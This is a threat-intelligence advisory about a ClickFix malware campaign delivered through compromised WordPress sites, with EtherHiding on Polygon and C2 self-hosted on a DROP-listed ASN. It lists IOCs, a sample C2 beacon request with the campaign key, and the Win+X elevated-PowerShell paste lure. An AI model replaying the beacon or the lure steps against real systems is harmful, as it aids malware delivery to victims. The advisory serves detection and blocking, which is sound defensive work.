TLP:CLEAR Campaign under pressure · self-hosted C2

WP-002 ClickFix "Variant C" — Polygon EtherHiding & Self-Hosted C2 on AS202412

Advisory SL-ADV-2026-WP-001 v17 — lure #3, EtherHiding migrated to Polygon, C2 forced onto the operator's own Spamhaus-DROP ASN, delivery degrading
Author: Dispensight / SecureLeafPublished: 2026-09-28Family: Remus (WP-002)Lure: gogreenlightloans[.]com

Executive summary

A third compromised-WordPress lure (gogreenlightloans[.]com) was captured delivering the WP-002 ClickFix chain. Two structural shifts stand out: EtherHiding migrated from BSC-testnet to Polygon, and the C2 has moved off Cloudflare-fronted stagers onto a domain that resolves directly to the operator's own AS202412 (Spamhaus DROP-listed) IP 178.16.52.101 — the first time this campaign's live C2 is hosted directly on the offender ASN.

In the captured session the Polygon retrieval failed (RPC returned a maintenance page) and only a non-command numeric string reached the clipboard — no runnable payload. This is degraded delivery, consistent with sustained takedown/blocklist pressure eroding the actor's fronting options and pushing them onto DROP-listed self-hosting.

1 · Kill chain (from decrypted TLS)

Compromised lure — gogreenlightloans[.]com

GoDaddy WordPress (bankio-core theme + Elementor); Cloudflare 104.21.1.64 / origin 160.153.0.8. Victim — splitcam: never blocklisted.

EtherHiding on Polygon — T1102 · FAILED this session

polygon-bor-rpc.publicnode.com (migrated from BSC-testnet). The eth_call returned an error/maintenance page — the on-chain command source did not resolve.

Self-hosted C2 — entry-verifed-cdn[.]codes · T1583.004

Resolves directly to 178.16.52.101 — Omegatech AS202412, Spamhaus DROP. No Cloudflare fronting. Serves the arming stage and the api.php beacon.

Encoded beacon — api.php · T1071.001

base64-JSON {action:"dl", k:<campaign>, os:"windows", vid:<uuid>, ref:<lure>, ray:<cf>}. ?s=<k>&_v config, ?k=<k>&d=<b64> tasking, POST /api.php loop.

Clipboard arming — obfuscator.io stage · T1059.001

658 KB obfuscated JS (sha256 51d4def8…) performs the clipboard write. With the on-chain command source failed, it copied a fallback numeric string, not a command.

Elevated action — Win+X PowerShell(Admin) · T1204.004

Shared Variant-B social engineering: Win+X → I → Ctrl+V → Enter (elevated).

2 · The pressure story (why this matters)

Fronting options are burning down. v15/v16 stagers (asseload, cfsubs, helauth) were published to AbuseIPDB/OTX and are degraded. In v17 the actor has fallen back to self-hosting on their own ASN.
…onto Spamhaus-DROP infrastructure. AS202412 is fully DROP-listed. Hosting live C2 there is a forced move, not a preference — it maximizes exposure and blockability. A rational operator eventually cuts this sunk cost.
Delivery is visibly degrading. Failed Polygon fetch + garbage clipboard = the chain is breaking in the field, mirroring the freightbook365 (v16) intermittency. Defenders are ahead of the infrastructure.
Blockability is now trivial. A single CIDR block (178.16.52.0/24, or the whole DROP ASN) severs the v17 C2 — no Cloudflare shared-IP collateral to worry about.

3 · TDS / clipboard assessment

The captured session was engaged as a real target — the server returned action:"dl" with a genuine victim UUID and shipped the full 658 KB arming payload, the opposite of a TDS serving an analyst a benign decoy. The missing command is a source failure, not a decoy: this family sources the final clipboard command on-chain (EtherHiding), and the Polygon leg failed, so the arming JS copied a fallback numeric string. Classification of that exact string (decoy vs. encoded vs. garbage) is pending a paste of the clipboard contents; it is not reproduced here.

4 · Indicators of compromise

TypeValueRoleHandling
domainentry-verifed-cdn[.]codesself-hosted api.php C2block
ipv4178.16.52.101 (AS202412)C2 host (Spamhaus DROP)block
cidr178.16.52.0/24 / AS202412operator ASN now hosting C2block CIDR/ASN
campaign-keya3946e3ded820e3d2f02885bf63c8a3a176d58bb9403b402api.php k=/s=alert
domainpolygon-bor-rpc.publicnode.comEtherHiding RPC (abused-legit)correlate
sha25651d4def852645a4f7a436abe7aa4498d08f57395e2f40e3c17cdb3f95d03f2d2arming stage JS (658 KB)detect
urlhxxps://gogreenlightloans[.]com/compromised lure #3VICTIM — notify, do not block

5 · Detection

Shipped with this advisory: YARA (…V17.yar, 4 rules), Sigma (…V17.sigma.yml, 6 rules), STIX 2.1 (…V17.stix.json, 34 objects). Highest-value discriminator — the encoded beacon to DROP-listed infra:

GET /api.php?k=a3946e3ded820e3d2f02885bf63c8a3a176d58bb9403b402&d=<base64-json>
Host: entry-verifed-cdn.codes        --> resolves 178.16.52.101 (AS202412, Spamhaus DROP)

beacon JSON: {"action":"dl","k":"a3946...","os":"windows","vid":"<uuid>","ref":"https://gogreenlightloans.com/"}

6 · Recommended actions

PriorityAction
nowBlock entry-verifed-cdn[.]codes and 178.16.52.0/24; if feasible, null-route the whole AS202412 (already Spamhaus DROP).
nowAlert on /api.php with the campaign key or base64-JSON {"action":"dl"…} beacon.
soonHunt elevated Win+X PowerShell download cradles; alert on injected ClickFix DOM (id="clipboard-text"+checkbox-container).
coordNotify gogreenlightloans.com owner (compromised GoDaddy WP — bankio-core/Elementor).

Attribution: infrastructure-level only. Splitcam: compromised lure/victim hosts are never blocklisted. Provenance: chain reconstructed from an embedded-keylog pcapng via independent TLS decryption by Dispensight/SecureLeaf — Polygon EtherHiding, the api.php C2, and the direct AS202412 hosting all verified on the wire. The final clipboard command was not extracted; its on-chain source failed in the captured session.

SL-ADV-2026-WP-001 v17 · TLP:CLEAR · Dispensight / SecureLeaf · secureleaf.dispensight.com